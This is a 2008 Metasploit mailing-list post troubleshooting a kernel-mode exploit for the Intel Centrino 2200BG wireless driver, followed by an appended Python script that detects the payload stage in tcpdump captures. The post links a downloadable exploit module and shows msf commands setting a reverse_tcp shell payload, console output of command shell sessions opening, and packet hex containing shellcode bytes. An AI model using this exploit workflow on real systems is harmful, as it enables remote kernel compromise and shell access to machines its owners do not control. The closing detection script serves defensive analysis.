[framework] Mistake in kernel mode payloads
Giuseppe Gottardi
overet at securitydate.it
Tue Mar 11 14:43:41 CDT 2008
On Wed, Feb 27, 2008 at 1:34 AM, <mmiller at hick.org> wrote:
> On Wed, Feb 27, 2008 at 01:27:24AM +0100, Giuseppe Gottardi wrote:
> > Hi mans,
> > I have a little trouble with Windows kernel-mode exploitation.
> >
> > When a user-land payload is executed in the context of the lsass.exe
> > process, it forces lsass.exe to exit, and the system shuts
> > down after 60 seconds due to an lsass.exe system error.
>
> What is EXITFUNC set to when you run your exploit? In general, the
> stager assumes that the user-mode payload will take care of cleanup.
> Currently, this typically involves a call to ExitProcess, ExitThread, or
> generating an exception (depending on EXITFUNC). If your EXITFUNC is
> set to seh this will likely cause lsass to crash in the manner that
> you're seeing.
>
Sorry for the latency in getting back to you, I have been very busy these days.
I decided to publish the code we were talking about. It is a fully functional
exploit for the Intel Centrino 2200BG that you
can download from my web site and add to Metasploit if you want:
http://overet.securitydate.it/stuff/intel_2200BG_probe.rb
As you can see, EXITFUNC is not set to seh, but lsass.exe dies when
I try to use staged payloads.
For example...
msf exploit(intel_2200BG_probe) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
...
msf exploit(intel_2200BG_probe) > show options
Module options:

   Name       Current Setting    Required  Description
   ----       ---------------    --------  -----------
   ADDR_DST   00:0e:35:95:7b:45  yes       The MAC address to send this to
   CHANNEL    1                  yes       The default channel number
   DELAY      1                  yes       The number of seconds to sleep between the packets
   DRIVER     madwifing          yes       The name of the wireless driver for lorcon
   INTERFACE  ath8               yes       The name of the wireless interface
   RUNTIME    1000               yes       The number of time to run the attack

Payload options:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST     192.168.33.212   yes       The local address
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP2 (5.1.2600), w22n51.sys 8.0.12.20000
msf exploit(intel_2200BG_probe) > rexploit
[*] Started reverse handler
[*] Sending probe exploit to 00:0e:35:95:7b:45...
[-] #################################################################################################################
[*] Sending stage (474 bytes)
[*] Command shell session 2 opened (192.168.33.212:4444 -> 192.168.33.159:1085)
#
[*] Completed sending probe.
(lsass.exe dies)
tcpdump output:
15:45:30.849331 IP overet.imgames > 192.168.33.212.krb524: S 1057652243:1057652243(0) win 65535 <mss 1460,nop,nop,sackOK>
0x0000: 4500 0030 1abe 4000 8006 1b46 c0a8 219f E..0..@....F..!.
0x0010: c0a8 21d4 0435 115c 3f0a 7e13 0000 0000 ..!..5.\?.~.....
0x0020: 7002 ffff ebac 0000 0204 05b4 0101 0402 p...............
15:45:30.849386 IP 192.168.33.212.krb524 > overet.imgames: S 3241052817:3241052817(0) ack 1057652244 win 5840 <mss 1460,nop,nop,sackOK>
0x0000: 4500 0030 0000 4000 4006 7604 c0a8 21d4 E..0..@.@.v...!.
0x0010: c0a8 219f 115c 0435 c12e 8a91 3f0a 7e14 ..!..\.5....?.~.
0x0020: 7012 16d0 890b 0000 0204 05b4 0101 0402 p...............
15:45:30.849506 IP overet.imgames > 192.168.33.212.krb524: . ack 1 win 65535
0x0000: 4500 0028 1abf 4000 8006 1b4d c0a8 219f E..(..@....M..!.
0x0010: c0a8 21d4 0435 115c 3f0a 7e14 c12e 8a92 ..!..5.\?.~.....
0x0020: 5010 ffff cc9f 0000 0000 0000 0000 P.............
15:45:30.850715 IP 192.168.33.212.krb524 > overet.imgames: P 1:475(474) ack 1 win 5840
0x0000: 4500 0202 8379 4000 4006 f0b8 c0a8 21d4 E....y@.@.....!.
0x0010: c0a8 219f 115c 0435 c12e 8a92 3f0a 7e14 ..!..\.5....?.~.
0x0020: 5018 16d0 e9ca 0000 6833 3200 0068 5753 P.......h32..hWS
0x0030: 325f 57fc e84c 0000 0060 8b6c 2428 8b45 2_W..L...`.l$(.E
0x0040: 3c8b 7c05 7801 ef8b 4f18 8b5f 2001 ebe3 <.|.x...O.._....
0x0050: 3049 0I
15:45:30.988871 IP overet.imgames > 192.168.33.212.krb524: . ack 475 win 65061
0x0000: 4500 0028 1ac0 4000 8006 1b4c c0a8 219f E..(..@....L..!.
0x0010: c0a8 21d4 0435 115c 3f0a 7e14 c12e 8c6c ..!..5.\?.~....l
0x0020: 5010 fe25 cc9f 0000 0000 0000 0000 P..%..........
msf exploit(intel_2200BG_probe) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.33.212:4444 -> 192.168.33.159:1234
2 Command shell 192.168.33.212:4444 -> 192.168.33.159:1077
msf exploit(intel_2200BG_probe) > sessions -i 2
[*] Starting interaction with 2...
( Session doesn't appear :/ )
However, the exploit works with the "windows/exec" payload.
Do you have any idea about this problem?
Thanks for your support and regards,
Giuseppe Gottardi
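As an added example (not code from this thread or from the Framework), the script below reads tcpdump -x output like the capture above, strips the IPv4 and TCP headers and reports packets whose TCP payload begins with the prologue visible at the start of the 474-byte stage: two PUSH instructions that build the string "WS2_32" on the stack (68 33 32 00 00 / 68 57 53 32 5f). The signature is taken only from this capture and is illustrative, and the sample input is constructed from two of the packets in the post.

```python
# Detect a staged reverse_tcp stage transfer in tcpdump -x output.
# Signature = the "WS2_32" push prologue seen at offset 0x28 of the capture above.
import re
import struct

WS2_32_PUSH_PROLOGUE = bytes.fromhex("6833320000685753325f")
HEX_WORD = re.compile(r"^[0-9a-f]{2,4}$")

# Constructed sample: the SYN and the PSH packet from the capture in the post.
SAMPLE_DUMP = r"""
15:45:30.849331 IP overet.imgames > 192.168.33.212.krb524: S
0x0000: 4500 0030 1abe 4000 8006 1b46 c0a8 219f E..0..@....F..!.
0x0010: c0a8 21d4 0435 115c 3f0a 7e13 0000 0000 ..!..5.\?.~.....
0x0020: 7002 ffff ebac 0000 0204 05b4 0101 0402 p...............
15:45:30.850715 IP 192.168.33.212.krb524 > overet.imgames: P
0x0000: 4500 0202 8379 4000 4006 f0b8 c0a8 21d4 E....y@.@.....!.
0x0010: c0a8 219f 115c 0435 c12e 8a92 3f0a 7e14 ..!..\.5....?.~.
0x0020: 5018 16d0 e9ca 0000 6833 3200 0068 5753 P.......h32..hWS
0x0030: 325f 57fc e84c 0000 0060 8b6c 2428 8b45 2_W..L...`.l$(.E
"""

def parse_tcpdump_hex(dump):
    """One bytes object per packet; a new packet starts at an '0x0000:' line."""
    packets = []
    for line in dump.splitlines():
        tok = line.split()
        if not tok or not tok[0].startswith("0x") or not tok[0].endswith(":"):
            continue  # timestamp/summary line or blank line
        if tok[0] == "0x0000:":
            packets.append(bytearray())
        for word in tok[1:9]:  # at most eight hex words precede the ASCII column
            if not HEX_WORD.match(word):
                break
            packets[-1] += bytes.fromhex(word)
    return [bytes(p) for p in packets]

def find_stage_transfers(dump):
    """Return (src_port, dst_port, stage_len) for each packet whose TCP payload
    starts with the prologue; stage_len comes from the IP total length, so it
    is correct even though the captured dump is truncated."""
    hits = []
    for pkt in parse_tcpdump_hex(dump):
        if len(pkt) < 40:
            continue  # too short for IPv4 + TCP headers
        ihl = (pkt[0] & 0x0F) * 4                      # IPv4 header length
        total_len = struct.unpack("!H", pkt[2:4])[0]
        sport, dport = struct.unpack("!HH", pkt[ihl:ihl + 4])
        doff = (pkt[ihl + 12] >> 4) * 4                # TCP header length
        if pkt[ihl + doff:total_len].startswith(WS2_32_PUSH_PROLOGUE):
            hits.append((sport, dport, total_len - ihl - doff))
    return hits
```

Run against the sample it reports one hit, (4444, 1077, 474), matching the "Sending stage (474 bytes)" message and the session 2 tunnel in the post.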